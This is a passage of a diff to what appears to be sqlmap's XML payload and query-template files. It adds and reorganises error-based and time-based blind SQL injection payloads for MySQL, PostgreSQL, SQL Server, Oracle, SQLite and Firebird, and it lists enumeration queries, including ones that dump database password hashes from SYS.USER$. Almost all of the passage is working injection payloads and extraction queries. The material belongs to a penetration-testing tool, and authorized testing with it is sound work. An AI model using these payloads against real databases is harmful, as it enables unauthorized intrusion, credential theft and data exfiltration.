<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload> <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
</request> </request>
@ -791,6 +816,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
<request> <request>
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload> <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request> </request>
@ -809,6 +835,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>3</clause> <clause>3</clause>
<where>3</where> <where>3</where>
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
<request> <request>
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload> <payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
</request> </request>
@ -827,6 +854,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>3</clause> <clause>3</clause>
<where>3</where> <where>3</where>
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
<request> <request>
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload> <payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request> </request>
@ -1078,6 +1106,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
<request> <request>
<payload>AND SLEEP([SLEEPTIME])</payload> <payload>AND SLEEP([SLEEPTIME])</payload>
</request> </request>
@ -1097,6 +1126,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
<request> <request>
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload> <payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
</request> </request>
@ -1108,25 +1138,6 @@ Formats:
</details> </details>
</test> </test>
<test>
<title>PostgreSQL &gt; 8.1 AND time-based blind</title>
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<request>
<payload>AND PG_SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>PostgreSQL</dbms>
<dbms_version>&gt; 8.1</dbms_version>
</details>
</test>
<test> <test>
<title>SQLite &gt; 2.0 AND time-based blind</title> <title>SQLite &gt; 2.0 AND time-based blind</title>
<stype>5</stype> <stype>5</stype>
@ -1134,6 +1145,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload> <payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
</request> </request>
@ -1154,6 +1166,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload> <payload>AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
</request> </request>
@ -1167,7 +1180,7 @@ Formats:
</test> </test>
<!-- <!--
NOTE: there is no way to perform this test against Microsoft SQL NOTE: there is no way to perform this test against Microsoft SQL
Server, Sybase, Oracle or PostgreSQL < 8.2 Server, Sybase, Oracle or PostgreSQL
--> -->
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB --> <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
<!-- End of AND time-based blind tests --> <!-- End of AND time-based blind tests -->
@ -1181,6 +1194,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
<request> <request>
<payload>OR SLEEP([SLEEPTIME])</payload> <payload>OR SLEEP([SLEEPTIME])</payload>
</request> </request>
@ -1200,6 +1214,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
<request> <request>
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload> <payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
</request> </request>
@ -1211,25 +1226,6 @@ Formats:
</details> </details>
</test> </test>
<test>
<title>PostgreSQL &gt; 8.1 OR time-based blind</title>
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<where>1</where>
<request>
<payload>OR PG_SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>PostgreSQL</dbms>
<dbms_version>&gt; 8.1</dbms_version>
</details>
</test>
<test> <test>
<title>SQLite &gt; 2.0 OR time-based blind</title> <title>SQLite &gt; 2.0 OR time-based blind</title>
<stype>5</stype> <stype>5</stype>
@ -1237,6 +1233,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload> <payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
</request> </request>
@ -1257,6 +1254,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload> <payload>OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
</request> </request>
@ -1270,7 +1268,7 @@ Formats:
</test> </test>
<!-- <!--
NOTE: there is no way to perform this test against Microsoft SQL NOTE: there is no way to perform this test against Microsoft SQL
Server, Sybase, Oracle or PostgreSQL < 8.2 Server, Sybase, Oracle or PostgreSQL
--> -->
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB --> <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
<!-- End of OR time-based blind tests --> <!-- End of OR time-based blind tests -->

View File

@ -24,7 +24,6 @@
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/> <timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
<substring query="MID((%s), %d, %d)"/> <substring query="MID((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/> <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
<banner query="VERSION()"/> <banner query="VERSION()"/>
<current_user query="CURRENT_USER()"/> <current_user query="CURRENT_USER()"/>
@ -74,84 +73,6 @@
</search_column> </search_column>
</dbms> </dbms>
<!-- Oracle -->
<dbms value="Oracle">
<cast query="CAST(%s AS VARCHAR(4000))"/>
<length query="LENGTH(%s)"/>
<isnull query="NVL(%s, ' ')"/>
<delimiter query="||"/>
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
<limitgroupstart/>
<limitgroupstop/>
<limitstring/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--"/>
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
<substring query="SUBSTR((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
<error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||%s||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||%s||CHR(62))) FROM DUAL)"/>
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
<current_user query="SELECT USER FROM DUAL"/>
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
<!--
NOTE: in Oracle to check if the session user is DBA you can use:
SELECT USERENV('ISDBA') FROM DUAL
-->
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
<users>
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
</users>
<passwords>
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
</passwords>
<!--
NOTE: in Oracle to enumerate the privileges for the session user you can use:
SELECT * FROM SESSION_PRIVS
-->
<privileges>
<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
</privileges>
<!--
NOTE: in Oracle to enumerate the roles for the session user you can use:
SELECT * FROM SESSION_ROLES
-->
<roles>
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
</roles>
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
<dbs/>
<tables>
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
</tables>
<columns>
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s"/>
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
</dump_table>
<search_db/>
<search_table>
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
</search_table>
<search_column>
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
</search_column>
</dbms>
<!-- PostgreSQL --> <!-- PostgreSQL -->
<dbms value="PostgreSQL"> <dbms value="PostgreSQL">
<cast query="CAST(%s AS CHARACTER(10000))"/> <cast query="CAST(%s AS CHARACTER(10000))"/>
@ -175,7 +96,6 @@
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/> <timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
<substring query="SUBSTR((%s)::text, %d, %d)"/> <substring query="SUBSTR((%s)::text, %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<error query="%s %s=CAST(%s||(%s)::text||%s AS NUMERIC)"/>
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/> <inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
<banner query="SELECT VERSION()"/> <banner query="SELECT VERSION()"/>
<current_user query="SELECT CURRENT_USER"/> <current_user query="SELECT CURRENT_USER"/>
@ -242,7 +162,6 @@
<timedelay query="WAITFOR DELAY '0:0:%d'"/> <timedelay query="WAITFOR DELAY '0:0:%d'"/>
<substring query="SUBSTRING((%s), %d, %d)"/> <substring query="SUBSTRING((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/> <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/> <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
<banner query="SELECT @@VERSION"/> <banner query="SELECT @@VERSION"/>
<current_user query="SELECT SYSTEM_USER"/> <current_user query="SELECT SYSTEM_USER"/>
@ -290,6 +209,83 @@
</search_column> </search_column>
</dbms> </dbms>
<!-- Oracle -->
<dbms value="Oracle">
<cast query="CAST(%s AS VARCHAR(4000))"/>
<length query="LENGTH(%s)"/>
<isnull query="NVL(%s, ' ')"/>
<delimiter query="||"/>
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
<limitgroupstart/>
<limitgroupstop/>
<limitstring/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--"/>
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
<substring query="SUBSTR((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
<current_user query="SELECT USER FROM DUAL"/>
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
<!--
NOTE: in Oracle to check if the session user is DBA you can use:
SELECT USERENV('ISDBA') FROM DUAL
-->
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
<users>
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
</users>
<passwords>
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
</passwords>
<!--
NOTE: in Oracle to enumerate the privileges for the session user you can use:
SELECT * FROM SESSION_PRIVS
-->
<privileges>
<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
</privileges>
<!--
NOTE: in Oracle to enumerate the roles for the session user you can use:
SELECT * FROM SESSION_ROLES
-->
<roles>
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
</roles>
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
<dbs/>
<tables>
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
</tables>
<columns>
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s"/>
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
</dump_table>
<search_db/>
<search_table>
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
</search_table>
<search_column>
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
</search_column>
</dbms>
<!-- SQLite --> <!-- SQLite -->
<dbms value="SQLite"> <dbms value="SQLite">
<!-- Not supported on SQLite 2 --> <!-- Not supported on SQLite 2 -->
@ -477,7 +473,6 @@
<timedelay query="WAITFOR DELAY '0:0:%d'"/> <timedelay query="WAITFOR DELAY '0:0:%d'"/>
<substring query="SUBSTRING((%s), %d, %d)"/> <substring query="SUBSTRING((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/> <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/> <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
<banner query="SELECT @@VERSION"/> <banner query="SELECT @@VERSION"/>
<current_user query="SELECT SUSER_NAME()"/> <current_user query="SELECT SUSER_NAME()"/>